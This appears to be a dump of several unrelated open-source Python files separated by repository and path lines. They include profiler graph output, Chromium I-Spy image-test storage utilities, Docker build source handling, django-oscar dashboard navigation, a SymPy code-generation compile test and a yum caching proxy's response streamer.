fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = SysprofParser(fp)
elif self.options.format == 'hprof':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = HProfParser(fp)
elif self.options.format == 'pstats':
if not self.args:
parser.error('at least a file must be specified for pstats input')
parser = PstatsParser(*self.args)
elif self.options.format == 'xperf':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = XPerfParser(fp)
elif self.options.format == 'shark':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = SharkParser(fp)
elif self.options.format == 'sleepy':
if len(self.args) != 1:
parser.error('exactly one file must be specified for sleepy input')
parser = SleepyParser(self.args[0])
elif self.options.format == 'aqtime':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = AQtimeParser(fp)
else:
parser.error('invalid format \'%s\'' % self.options.format)
self.profile = parser.parse()
if self.options.output is None:
self.output = sys.stdout
else:
self.output = open(self.options.output, 'wt')
self.write_graph()
_parenthesis_re = re.compile(r'\([^()]*\)')
_angles_re = re.compile(r'<[^<>]*>')
_const_re = re.compile(r'\s+const$')
def strip_function_name(self, name):
"""Remove extraneous information from C++ demangled function names."""
# Strip function parameters from name by recursively removing paired parenthesis
while True:
name, n = self._parenthesis_re.subn('', name)
if not n:
break
# Strip const qualifier
name = self._const_re.sub('', name)
# Strip template parameters from name by recursively removing paired angles
while True:
name, n = self._angles_re.subn('', name)
if not n:
break
return name
def wrap_function_name(self, name):
"""Split the function name on multiple lines."""
if len(name) > 32:
ratio = 2.0/3.0
height = max(int(len(name)/(1.0 - ratio) + 0.5), 1)
width = max(len(name)/height, 32)
# TODO: break lines in symbols
name = textwrap.fill(name, width, break_long_words=False)
# Take away spaces
name = name.replace(", ", ",")
name = name.replace("> >", ">>")
name = name.replace("> >", ">>") # catch consecutive
return name
def compress_function_name(self, name):
"""Compress function name according to the user preferences."""
if self.options.strip:
name = self.strip_function_name(name)
if self.options.wrap:
name = self.wrap_function_name(name)
# TODO: merge functions with same resulting name
return name
def write_graph(self):
dot = DotWriter(self.output)
profile = self.profile
profile.prune(self.options.node_thres/100.0, self.options.edge_thres/100.0)
for function in profile.functions.itervalues():
function.name = self.compress_function_name(function.name)
dot.graph(profile, self.theme)
if __name__ == '__main__':
Main().main()
|
oopy/micropython
|
refs/heads/master
|
tests/unicode/file1.py
|
115
|
f = open("unicode/data/utf-8_1.txt", encoding="utf-8")
l = f.readline()
print(l)
print(len(l))
|
nwjs/chromium.src
|
refs/heads/nw45-log
|
chrome/test/ispy/common/ispy_utils.py
|
88
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Internal utilities for managing I-Spy test results in Google Cloud Storage.
See the ispy.ispy_api module for the external API.
"""
import collections
import itertools
import json
import os
import sys
import image_tools
_INVALID_EXPECTATION_CHARS = ['/', '\\', ' ', '"', '\'']
def IsValidExpectationName(expectation_name):
return not any(c in _INVALID_EXPECTATION_CHARS for c in expectation_name)
def GetExpectationPath(expectation, file_name=''):
"""Get the path to a test file in the given test run and expectation.
Args:
expectation: name of the expectation.
file_name: name of the file.
Returns:
the path as a string relative to the bucket.
"""
return 'expectations/%s/%s' % (expectation, file_name)
def GetFailurePath(test_run, expectation, file_name=''):
"""Get the path to a failure file in the given test run and test.
Args:
test_run: name of the test run.
expectation: name of the expectation.
file_name: name of the file.
Returns:
the path as a string relative to the bucket.
"""
return GetTestRunPath(test_run, '%s/%s' % (expectation, file_name))
def GetTestRunPath(test_run, file_name=''):
"""Get the path to a the given test run.
Args:
test_run: name of the test run.
file_name: name of the file.
Returns:
the path as a string relative to the bucket.
"""
return 'failures/%s/%s' % (test_run, file_name)
class ISpyUtils(object):
"""Utility functions for working with an I-Spy google storage bucket."""
def __init__(self, cloud_bucket):
"""Initialize with a cloud bucket instance to supply GS functionality.
Args:
cloud_bucket: An object implementing the cloud_bucket.BaseCloudBucket
interface.
"""
self.cloud_bucket = cloud_bucket
def UploadImage(self, full_path, image):
"""Uploads an image to a location in GS.
Args:
full_path: the path to the file in GS including the file extension.
image: a RGB PIL.Image to be uploaded.
"""
self.cloud_bucket.UploadFile(
full_path, image_tools.EncodePNG(image), 'image/png')
def DownloadImage(self, full_path):
"""Downloads an image from a location in GS.
Args:
full_path: the path to the file in GS including the file extension.
Returns:
The downloaded RGB PIL.Image.
Raises:
cloud_bucket.NotFoundError: if the path to the image is not valid.
"""
return image_tools.DecodePNG(self.cloud_bucket.DownloadFile(full_path))
def UpdateImage(self, full_path, image):
"""Updates an existing image in GS, preserving permissions and metadata.
Args:
full_path: the path to the file in GS including the file extension.
image: a RGB PIL.Image.
"""
self.cloud_bucket.UpdateFile(full_path, image_tools.EncodePNG(image))
def GenerateExpectation(self, expectation, images):
"""Creates and uploads an expectation to GS from a set of images and name.
This method generates a mask from the uploaded images, then
uploads the mask and first of the images to GS as a expectation.
Args:
expectation: name for this expectation, any existing expectation with the
name will be replaced.
images: a list of RGB encoded PIL.Images
Raises:
ValueError: if the expectation name is invalid.
"""
if not IsValidExpectationName(expectation):
raise ValueError("Expectation name contains an illegal character: %s." %
str(_INVALID_EXPECTATION_CHARS))
mask = image_tools.InflateMask(image_tools.CreateMask(images), 7)
self.UploadImage(
GetExpectationPath(expectation, 'expected.png'), images[0])
self.UploadImage(GetExpectationPath(expectation, 'mask.png'), mask)
def PerformComparison(self, test_run, expectation, actual):
"""Runs an image comparison, and uploads discrepancies to GS.
Args:
test_run: the name of the test_run.
expectation: the name of the expectation to use for comparison.
actual: an RGB-encoded PIL.Image that is the actual result.
Raises:
cloud_bucket.NotFoundError: if the given expectation is not found.
ValueError: if the expectation name is invalid.
"""
if not IsValidExpectationName(expectation):
raise ValueError("Expectation name contains an illegal character: %s." %
str(_INVALID_EXPECTATION_CHARS))
expectation_tuple = self.GetExpectation(expectation)
if not image_tools.SameImage(
actual, expectation_tuple.expected, mask=expectation_tuple.mask):
self.UploadImage(
GetFailurePath(test_run, expectation, 'actual.png'), actual)
diff, diff_pxls = image_tools.VisualizeImageDifferences(
expectation_tuple.expected, actual, mask=expectation_tuple.mask)
self.UploadImage(GetFailurePath(test_run, expectation, 'diff.png'), diff)
self.cloud_bucket.UploadFile(
GetFailurePath(test_run, expectation, 'info.txt'),
json.dumps({
'different_pixels': diff_pxls,
'fraction_different':
diff_pxls / float(actual.size[0] * actual.size[1])}),
'application/json')
def GetExpectation(self, expectation):
"""Returns the given expectation from GS.
Args:
expectation: the name of the expectation to get.
Returns:
A named tuple: 'Expectation', containing two images: expected and mask.
Raises:
cloud_bucket.NotFoundError: if the test is not found in GS.
"""
Expectation = collections.namedtuple('Expectation', ['expected', 'mask'])
return Expectation(self.DownloadImage(GetExpectationPath(expectation,
'expected.png')),
self.DownloadImage(GetExpectationPath(expectation,
'mask.png')))
def ExpectationExists(self, expectation):
"""Returns whether the given expectation exists in GS.
Args:
expectation: the name of the expectation to check.
Returns:
A boolean indicating whether the test exists.
"""
expected_image_exists = self.cloud_bucket.FileExists(
GetExpectationPath(expectation, 'expected.png'))
mask_image_exists = self.cloud_bucket.FileExists(
GetExpectationPath(expectation, 'mask.png'))
return expected_image_exists and mask_image_exists
def FailureExists(self, test_run, expectation):
"""Returns whether a failure for the expectation exists for the given run.
Args:
test_run: the name of the test_run.
expectation: the name of the expectation that failed.
Returns:
A boolean indicating whether the failure exists.
"""
actual_image_exists = self.cloud_bucket.FileExists(
GetFailurePath(test_run, expectation, 'actual.png'))
test_exists = self.ExpectationExists(expectation)
info_exists = self.cloud_bucket.FileExists(
GetFailurePath(test_run, expectation, 'info.txt'))
return test_exists and actual_image_exists and info_exists
def RemoveExpectation(self, expectation):
"""Removes an expectation and all associated failures with that test.
Args:
expectation: the name of the expectation to remove.
"""
test_paths = self.cloud_bucket.GetAllPaths(
GetExpectationPath(expectation))
for path in test_paths:
self.cloud_bucket.RemoveFile(path)
def GenerateExpectationPinkOut(self, expectation, images, pint_out, rgb):
"""Uploads an ispy-test to GS with the pink_out workaround.
Args:
expectation: the name of the expectation to be uploaded.
images: a json encoded list of base64 encoded png images.
pink_out: an image.
RGB: a json list representing the RGB values of a color to mask out.
Raises:
ValueError: if expectation name is invalid.
"""
if not IsValidExpectationName(expectation):
raise ValueError("Expectation name contains an illegal character: %s." %
str(_INVALID_EXPECTATION_CHARS))
# convert the pink_out into a mask
black = (0, 0, 0, 255)
white = (255, 255, 255, 255)
pink_out.putdata(
[black if px == (rgb[0], rgb[1], rgb[2], 255) else white
for px in pink_out.getdata()])
mask = image_tools.CreateMask(images)
mask = image_tools.InflateMask(image_tools.CreateMask(images), 7)
combined_mask = image_tools.AddMasks([mask, pink_out])
self.UploadImage(GetExpectationPath(expectation, 'expected.png'), images[0])
self.UploadImage(GetExpectationPath(expectation, 'mask.png'), combined_mask)
def RemoveFailure(self, test_run, expectation):
"""Removes a failure from GS.
Args:
test_run: the name of the test_run.
expectation: the expectation on which the failure to be removed occured.
"""
failure_paths = self.cloud_bucket.GetAllPaths(
GetFailurePath(test_run, expectation))
for path in failure_paths:
self.cloud_bucket.RemoveFile(path)
def GetFailure(self, test_run, expectation):
"""Returns a given test failure's expected, diff, and actual images.
Args:
test_run: the name of the test_run.
expectation: the name of the expectation the result corresponds to.
Returns:
A named tuple: Failure containing three images: expected, diff, and
actual.
Raises:
cloud_bucket.NotFoundError: if the result is not found in GS.
"""
expected = self.DownloadImage(
GetExpectationPath(expectation, 'expected.png'))
actual = self.DownloadImage(
GetFailurePath(test_run, expectation, 'actual.png'))
diff = self.DownloadImage(
GetFailurePath(test_run, expectation, 'diff.png'))
info = json.loads(self.cloud_bucket.DownloadFile(
GetFailurePath(test_run, expectation, 'info.txt')))
Failure = collections.namedtuple(
'Failure', ['expected', 'diff', 'actual', 'info'])
return Failure(expected, diff, actual, info)
def GetAllPaths(self, prefix, max_keys=None, marker=None, delimiter=None):
"""Gets urls to all files in GS whose path starts with a given prefix.
Args:
prefix: the prefix to filter files in GS by.
max_keys: Integer. Specifies the maximum number of objects returned
marker: String. Only objects whose fullpath starts lexicographically
after marker (exclusively) will be returned
delimiter: String. Turns on directory mode, specifies characters
to be used as directory separators
Returns:
a list containing urls to all objects that started with
the prefix.
"""
return self.cloud_bucket.GetAllPaths(
prefix, max_keys=max_keys, marker=marker, delimiter=delimiter)
|
TomasTomecek/atomic-reactor
|
refs/heads/master
|
atomic_reactor/source.py
|
6
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
Code for getting source code to put inside container.
"""
import logging
import copy
import os
import shutil
import tempfile
from atomic_reactor import util
from atomic_reactor.constants import SOURCE_DIRECTORY_NAME
logger = logging.getLogger(__name__)
class Source(object):
def __init__(self, provider, uri, dockerfile_path=None, provider_params=None, tmpdir=None):
self.provider = provider
self.uri = uri
self.dockerfile_path = dockerfile_path
self.provider_params = provider_params or {}
# TODO: do we want to delete tmpdir when destroying the object?
self.tmpdir = tmpdir or tempfile.mkdtemp()
logger.debug("workdir is %s", repr(self.tmpdir))
self.source_path = os.path.join(self.tmpdir, SOURCE_DIRECTORY_NAME)
logger.debug("source path is %s", repr(self.source_path))
@property
def path(self):
return self.get()
@property
def workdir(self):
return self.tmpdir
def get(self):
"""Run this to get source and save it to `tmpdir` or a newly created tmpdir."""
raise NotImplementedError('Must override in subclasses!')
def get_dockerfile_path(self):
# TODO: will we need figure_out_dockerfile as a separate method?
return util.figure_out_dockerfile(self.path, self.dockerfile_path)
def remove_tmpdir(self):
shutil.rmtree(self.tmpdir)
class GitSource(Source):
def __init__(self, provider, uri, dockerfile_path=None, provider_params=None, tmpdir=None):
super(GitSource, self).__init__(provider, uri, dockerfile_path,
provider_params, tmpdir)
self.git_commit = self.provider_params.get('git_commit', None)
self.lg = util.LazyGit(self.uri, self.git_commit, self.source_path)
def get(self):
return self.lg.git_path
class PathSource(Source):
def __init__(self, provider, uri, dockerfile_path=None, provider_params=None, tmpdir=None):
super(PathSource, self).__init__(provider, uri, dockerfile_path,
provider_params, tmpdir)
# make sure we have canonical URI representation even if we got path without "file://"
if not self.uri.startswith('file://'):
self.uri = 'file://' + self.uri
self.schemeless_path = self.uri[len('file://'):]
os.makedirs(self.source_path)
def get(self):
# work around the weird behaviour of copytree, which requires the top dir
# to *not* exist
for f in os.listdir(self.schemeless_path):
old = os.path.join(self.schemeless_path, f)
new = os.path.join(self.source_path, f)
if os.path.exists(new):
# this is the second invocation of this method; just break the loop
break
else:
if os.path.isdir(old):
shutil.copytree(old, new)
else:
shutil.copy2(old, new)
return self.source_path
def get_source_instance_for(source, tmpdir=None):
validate_source_dict_schema(source)
klass = None
provider = source['provider'].lower()
if provider == 'git':
klass = GitSource
elif provider == 'path':
klass = PathSource
else:
raise ValueError('unknown source provider "{0}"'.format(provider))
# don't modify original source
args = copy.deepcopy(source)
args['tmpdir'] = tmpdir
return klass(**args)
def validate_source_dict_schema(sd):
if not isinstance(sd, dict):
raise ValueError('"source" must be a dict')
for k in ['provider', 'uri']:
if k not in sd:
raise ValueError('"source" must contain "{0}" key'.format(k))
|
nephila/django-google-webmastertools
|
refs/heads/master
|
setup.py
|
1
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import os
CLASSIFIERS = [
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'License :: OSI Approved :: BSD License',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP ',
]
setup(
author="Nephila s.a.s.",
author_email='web@nephila.it',
name='google_webmastertools',
version='0.1.0',
description='Django interface to Google Webmaster tools API',
# long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
url='http://www.nephila.it',
license='see LICENCE.txt',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
"Django < 1.4",
"gdata >= 2.0.17",
],
packages=find_packages(exclude=["project", "project.*"]),
include_package_data=True,
zip_safe=False,
dependency_links=[
],
)
|
Jannes123/django-oscar
|
refs/heads/master
|
src/oscar/apps/dashboard/nav.py
|
23
|
import re
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import NoReverseMatch, resolve, reverse
from django.http import Http404
from oscar.core.loading import AppNotFoundError, get_class
from oscar.views.decorators import check_permissions
class Node(object):
"""
A node in the dashboard navigation menu
"""
def __init__(self, label, url_name=None, url_args=None, url_kwargs=None,
access_fn=None, icon=None):
self.label = label
self.icon = icon
self.url_name = url_name
self.url_args = url_args
self.url_kwargs = url_kwargs
self.access_fn = access_fn
self.children = []
@property
def is_heading(self):
return self.url_name is None
@property
def url(self):
return reverse(self.url_name, args=self.url_args,
kwargs=self.url_kwargs)
def add_child(self, node):
self.children.append(node)
def is_visible(self, user):
return self.access_fn is None or self.access_fn(
user, self.url_name, self.url_args, self.url_kwargs)
def filter(self, user):
if not self.is_visible(user):
return None
node = Node(
label=self.label, url_name=self.url_name, url_args=self.url_args,
url_kwargs=self.url_kwargs, access_fn=self.access_fn,
icon=self.icon
)
for child in self.children:
if child.is_visible(user):
node.add_child(child)
return node
def has_children(self):
return len(self.children) > 0
def default_access_fn(user, url_name, url_args=None, url_kwargs=None):
"""
Given a url_name and a user, this function tries to assess whether the
user has the right to access the URL.
The application instance of the view is fetched via dynamic imports,
and those assumptions will only hold true if the standard Oscar layout
is followed.
Once the permissions for the view are known, the access logic used
by the dashboard decorator is evaluated
This function might seem costly, but a simple comparison with DTT
did not show any change in response time
"""
exception = ImproperlyConfigured(
"Please follow Oscar's default dashboard app layout or set a "
"custom access_fn")
if url_name is None: # it's a heading
return True
# get view module string
try:
url = reverse(url_name, args=url_args, kwargs=url_kwargs)
view_module = resolve(url).func.__module__
except (NoReverseMatch, Http404):
# if there's no match, no need to display it
return False
# We can't assume that the view has the same parent module as the app,
# as either the app or view can be customised. So we turn the module
# string (e.g. 'oscar.apps.dashboard.catalogue.views') into an app
# label that can be loaded by get_class (e.g.
# 'dashboard.catalogue.app), which then essentially checks
# INSTALLED_APPS for the right module to load
match = re.search('(dashboard[\w\.]*)\.views$', view_module)
if not match:
raise exception
app_label_str = match.groups()[0] + '.app'
try:
app_instance = get_class(app_label_str, 'application')
except AppNotFoundError:
raise exception
# handle name-spaced view names
if ':' in url_name:
view_name = url_name.split(':')[1]
else:
view_name = url_name
permissions = app_instance.get_permissions(view_name)
return check_permissions(user, permissions)
|
madan96/sympy
|
refs/heads/master
|
sympy/external/tests/test_codegen.py
|
73
|
# This tests the compilation and execution of the source code generated with
# utilities.codegen. The compilation takes place in a temporary directory that
# is removed after the test. By default the test directory is always removed,
# but this behavior can be changed by setting the environment variable
# SYMPY_TEST_CLEAN_TEMP to:
# export SYMPY_TEST_CLEAN_TEMP=always : the default behavior.
# export SYMPY_TEST_CLEAN_TEMP=success : only remove the directories of working tests.
# export SYMPY_TEST_CLEAN_TEMP=never : never remove the directories with the test code.
# When a directory is not removed, the necessary information is printed on
# screen to find the files that belong to the (failed) tests. If a test does
# not fail, py.test captures all the output and you will not see the directories
# corresponding to the successful tests. Use the --nocapture option to see all
# the output.
# All tests below have a counterpart in utilities/test/test_codegen.py. In the
# latter file, the resulting code is compared with predefined strings, without
# compilation or execution.
# All the generated Fortran code should conform with the Fortran 95 standard,
# and all the generated C code should be ANSI C, which facilitates the
# incorporation in various projects. The tests below assume that the binary cc
# is somewhere in the path and that it can compile ANSI C code.
from __future__ import print_function
from sympy.abc import x, y, z
from sympy.utilities.pytest import skip
from sympy.utilities.codegen import codegen, make_routine, get_code_generator
import sys
import os
import tempfile
import subprocess
# templates for the main program that will test the generated code.
main_template = {}
main_template['F95'] = """
program main
include "codegen.h"
integer :: result;
result = 0
%(statements)s
call exit(result)
end program
"""
main_template['C'] = """
#include "codegen.h"
#include <stdio.h>
#include <math.h>
int main() {
int result = 0;
%(statements)s
return result;
}
"""
# templates for the numerical tests
numerical_test_template = {}
numerical_test_template['C'] = """
if (fabs(%(call)s)>%(threshold)s) {
printf("Numerical validation failed: %(call)s=%%e threshold=%(threshold)s\\n", %(call)s);
result = -1;
}
"""
numerical_test_template['F95'] = """
if (abs(%(call)s)>%(threshold)s) then
write(6,"('Numerical validation failed:')")
write(6,"('%(call)s=',e15.5,'threshold=',e15.5)") %(call)s, %(threshold)s
result = -1;
end if
"""
# command sequences for supported compilers
compile_commands = {}
compile_commands['cc'] = [
"cc -c codegen.c -o codegen.o",
"cc -c main.c -o main.o",
"cc main.o codegen.o -lm -o test.exe"
]
compile_commands['gfortran'] = [
"gfortran -c codegen.f90 -o codegen.o",
"gfortran -ffree-line-length-none -c main.f90 -o main.o",
"gfortran main.o codegen.o -o test.exe"
]
compile_commands['g95'] = [
"g95 -c codegen.f90 -o codegen.o",
"g95 -ffree-line-length-huge -c main.f90 -o main.o",
"g95 main.o codegen.o -o test.exe"
]
compile_commands['ifort'] = [
"ifort -c codegen.f90 -o codegen.o",
"ifort -c main.f90 -o main.o",
"ifort main.o codegen.o -o test.exe"
]
combinations_lang_compiler = [
('C', 'cc'),
('F95', 'ifort'),
('F95', 'gfortran'),
('F95', 'g95')
]
def try_run(commands):
"""Run a series of commands and only return True if all ran fine."""
null = open(os.devnull, 'w')
for command in commands:
retcode = subprocess.call(command, stdout=null, shell=True,
stderr=subprocess.STDOUT)
if retcode != 0:
return False
return True
def run_test(label, routines, numerical_tests, language, commands, friendly=True):
"""A driver for the codegen tests.
This driver assumes that a compiler ifort is present in the PATH and that
ifort is (at least) a Fortran 90 compiler. The generated code is written in
a temporary directory, together with a main program that validates the
generated code. The test passes when the compilation and the validation
run correctly.
"""
# Check input arguments before touching the file system
language = language.upper()
assert language in main_template
assert language in numerical_test_template
# Check that evironment variable makes sense
clean = os.getenv('SYMPY_TEST_CLEAN_TEMP', 'always').lower()
if clean not in ('always', 'success', 'never'):
raise ValueError("SYMPY_TEST_CLEAN_TEMP must be one of the following: 'always', 'success' or 'never'.")
# Do all the magic to compile, run and validate the test code
# 1) prepare the temporary working directory, switch to that dir
work = tempfile.mkdtemp("_sympy_%s_test" % language, "%s_" % label)
oldwork = os.getcwd()
os.chdir(work)
# 2) write the generated code
if friendly:
# interpret the routines as a name_expr list and call the friendly
# function codegen
codegen(routines, language, "codegen", to_files=True)
else:
code_gen = get_code_generator(language, "codegen")
code_gen.write(routines, "codegen", to_files=True)
# 3) write a simple main program that links to the generated code, and that
# includes the numerical tests
test_strings = []
for fn_name, args, expected, threshold in numerical_tests:
call_string = "%s(%s)-(%s)" % (
fn_name, ",".join(str(arg) for arg in args), expected)
if language == "F95":
call_string = fortranize_double_constants(call_string)
threshold = fortranize_double_constants(str(threshold))
test_strings.append(numerical_test_template[language] % {
"call": call_string,
"threshold": threshold,
})
if language == "F95":
f_name = "main.f90"
elif language == "C":
f_name = "main.c"
else:
raise NotImplementedError(
"FIXME: filename extension unknown for language: %s" % language)
with open(f_name, "w") as f:
f.write(
main_template[language] % {'statements': "".join(test_strings)})
# 4) Compile and link
compiled = try_run(commands)
# 5) Run if compiled
if compiled:
executed = try_run(["./test.exe"])
else:
executed = False
# 6) Clean up stuff
if clean == 'always' or (clean == 'success' and compiled and executed):
def safe_remove(filename):
if os.path.isfile(filename):
os.remove(filename)
safe_remove("codegen.f90")
safe_remove("codegen.c")
safe_remove("codegen.h")
safe_remove("codegen.o")
safe_remove("main.f90")
safe_remove("main.c")
safe_remove("main.o")
safe_remove("test.exe")
os.chdir(oldwork)
os.rmdir(work)
else:
print("TEST NOT REMOVED: %s" % work, file=sys.stderr)
os.chdir(oldwork)
# 7) Do the assertions in the end
assert compiled, "failed to compile %s code with:\n%s" % (
language, "\n".join(commands))
assert executed, "failed to execute %s code from:\n%s" % (
language, "\n".join(commands))
def fortranize_double_constants(code_string):
"""
Replaces every literal float with literal doubles
"""
import re
pattern_exp = re.compile('\d+(\.)?\d*[eE]-?\d+')
pattern_float = re.compile('\d+\.\d*(?!\d*d)')
def subs_exp(matchobj):
return re.sub('[eE]', 'd', matchobj.group(0))
def subs_float(matchobj):
return "%sd0" % matchobj.group(0)
code_string = pattern_exp.sub(subs_exp, code_string)
code_string = pattern_float.sub(subs_float, code_string)
return code_string
def is_feasible(language, commands):
# This test should always work, otherwise the compiler is not present.
routine = make_routine("test", x)
numerical_tests = [
("test", ( 1.0,), 1.0, 1e-15),
("test", (-1.0,), -1.0, 1e-15),
]
try:
run_test("is_feasible", [routine], numerical_tests, language, commands,
friendly=False)
return True
except AssertionError:
return False
valid_lang_commands = []
invalid_lang_compilers = []
for lang, compiler in combinations_lang_compiler:
commands = compile_commands[compiler]
if is_feasible(lang, commands):
valid_lang_commands.append((lang, commands))
else:
invalid_lang_compilers.append((lang, compiler))
# We test all language-compiler combinations, just to report what is skipped
def test_C_cc():
if ("C", 'cc') in invalid_lang_compilers:
skip("`cc' command didn't work as expected")
def test_F95_ifort():
if ("F95", 'ifort') in invalid_lang_compilers:
skip("`ifort' command didn't work as expected")
def test_F95_gfortran():
if ("F95", 'gfortran') in invalid_lang_compilers:
skip("`gfortran' command didn't work as expected")
def test_F95_g95():
if ("F95", 'g95') in invalid_lang_compilers:
skip("`g95' command didn't work as expected")
# Here comes the actual tests
def test_basic_codegen():
numerical_tests = [
("test", (1.0, 6.0, 3.0), 21.0, 1e-15),
("test", (-1.0, 2.0, -2.5), -2.5, 1e-15),
]
name_expr = [("test", (x + y)*z)]
for lang, commands in valid_lang_commands:
run_test("basic_codegen", name_expr, numerical_tests, lang, commands)
def test_intrinsic_math1_codegen():
# not included: log10
from sympy import acos, asin, atan, ceiling, cos, cosh, floor, log, ln, \
sin, sinh, sqrt, tan, tanh, N
name_expr = [
("test_fabs", abs(x)),
("test_acos", acos(x)),
("test_asin", asin(x)),
("test_atan", atan(x)),
("test_cos", cos(x)),
("test_cosh", cosh(x)),
("test_log", log(x)),
("test_ln", ln(x)),
("test_sin", sin(x)),
("test_sinh", sinh(x)),
("test_sqrt", sqrt(x)),
("test_tan", tan(x)),
("test_tanh", tanh(x)),
]
numerical_tests = []
for name, expr in name_expr:
for xval in 0.2, 0.5, 0.8:
expected = N(expr.subs(x, xval))
numerical_tests.append((name, (xval,), expected, 1e-14))
for lang, commands in valid_lang_commands:
if lang == "C":
name_expr_C = [("test_floor", floor(x)), ("test_ceil", ceiling(x))]
else:
name_expr_C = []
run_test("intrinsic_math1", name_expr + name_expr_C,
numerical_tests, lang, commands)
def test_instrinsic_math2_codegen():
# not included: frexp, ldexp, modf, fmod
from sympy import atan2, N
name_expr = [
("test_atan2", atan2(x, y)),
("test_pow", x**y),
]
numerical_tests = []
for name, expr in name_expr:
for xval, yval in (0.2, 1.3), (0.5, -0.2), (0.8, 0.8):
expected = N(expr.subs(x, xval).subs(y, yval))
numerical_tests.append((name, (xval, yval), expected, 1e-14))
for lang, commands in valid_lang_commands:
run_test("intrinsic_math2", name_expr, numerical_tests, lang, commands)
def test_complicated_codegen():
from sympy import sin, cos, tan, N
name_expr = [
("test1", ((sin(x) + cos(y) + tan(z))**7).expand()),
("test2", cos(cos(cos(cos(cos(cos(cos(cos(x + y + z))))))))),
]
numerical_tests = []
for name, expr in name_expr:
for xval, yval, zval in (0.2, 1.3, -0.3), (0.5, -0.2, 0.0), (0.8, 2.1, 0.8):
expected = N(expr.subs(x, xval).subs(y, yval).subs(z, zval))
numerical_tests.append((name, (xval, yval, zval), expected, 1e-12))
for lang, commands in valid_lang_commands:
run_test(
"complicated_codegen", name_expr, numerical_tests, lang, commands)
|
Stratoscale/yumcache
|
refs/heads/master
|
yumcache/liveresponse.py
|
1
|
import time
from yumcache import cachedresponse
class LiveResponse:
def __init__(self, connection, downloader, range):
self._connection = connection
self._downloader = downloader
self._range = range
self._chunked = False
def replay(self):
if not self._waitToStart():
return
self._sendHeader()
self._sendContent()
def _waitToStart(self):
while self._downloader.length() is None:
time.sleep(0.1)
if self._downloader.error() is not None:
cachedresponse.CachedResponse(self._connection).respondNotFound()
return False
return True
def _sendHeader(self):
if self._range is None:
self._connection.sendall("HTTP/1.1 200 OK\r\n")
self._connection.sendall('content-type: application/octet-stream\r\n')
if self._downloader.length() != self._downloader.INVALID_LENGTH:
self._connection.sendall('content-length: %d\r\n\r\n' % self._downloader.length())
self._range = (0, self._downloader.length() - 1)
else:
self._chunked = True
self._connection.sendall('Transfer-Encoding: chunked\r\n\r\n')
self._range = (0, 1024 * 1024 * 1024)
else:
self._connection.sendall("HTTP/1.1 206 Partial Content\r\n")
self._connection.sendall('content-type: application/octet-stream\r\n')
if self._downloader.length() != self._downloader.INVALID_LENGTH:
self._connection.sendall(
'content-range: bytes %d-%d/%d\r\n' % (
self._range[0], self._range[1], self._downloader.length()))
else:
self._connection.sendall(
'content-range: bytes %d-%d\r\n' % (self._range[0], self._range[1]))
self._connection.sendall(
'content-length: %d\r\n\r\n' % (self._range[1] - self._range[0] + 1))
def _sendContent(self):
while self._range[0] <= self._range[1]:
before = time.time()
segment = None
while time.time() - before < 40:
try:
segment = self._downloader.content().substr(self._range[0], self._range[1] + 1)
except:
time.sleep(0.05)
continue
if self._downloader.done():
self._range = (self._range[0], self._downloader.content().length() - 1)
break
elif len(segment) == 0:
time.sleep(0.05)
else:
break
if segment is None:
raise Exception("Timeout waiting for download")
if self._chunked:
if len(segment) > 0:
self._connection.sendall("%x\r\n%s\r\n" % (len(segment), segment))
else:
self._connection.sendall(segment)
self._range = (self._range[0] + len(segment), self._range[1])
if self._chunked:
self._connection.sendall("0\r\n\r\n")
|
farm3r/ardupilot
|
refs/heads/master
|
mk/PX4/Tools/genmsg/src/genmsg/__init__.py
|
215
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from . base import EXT_MSG, EXT_SRV, SEP, log, plog, InvalidMsgSpec, log_verbose, MsgGenerationException
from . gentools import compute_md5, compute_full_text, compute_md5_text
from . names import resource_name_base, package_resource_name, is_legal_resource_base_name, \
resource_name_package, resource_name, is_legal_resource_name
from . msgs import HEADER, TIME, DURATION, MsgSpec, Constant, Field
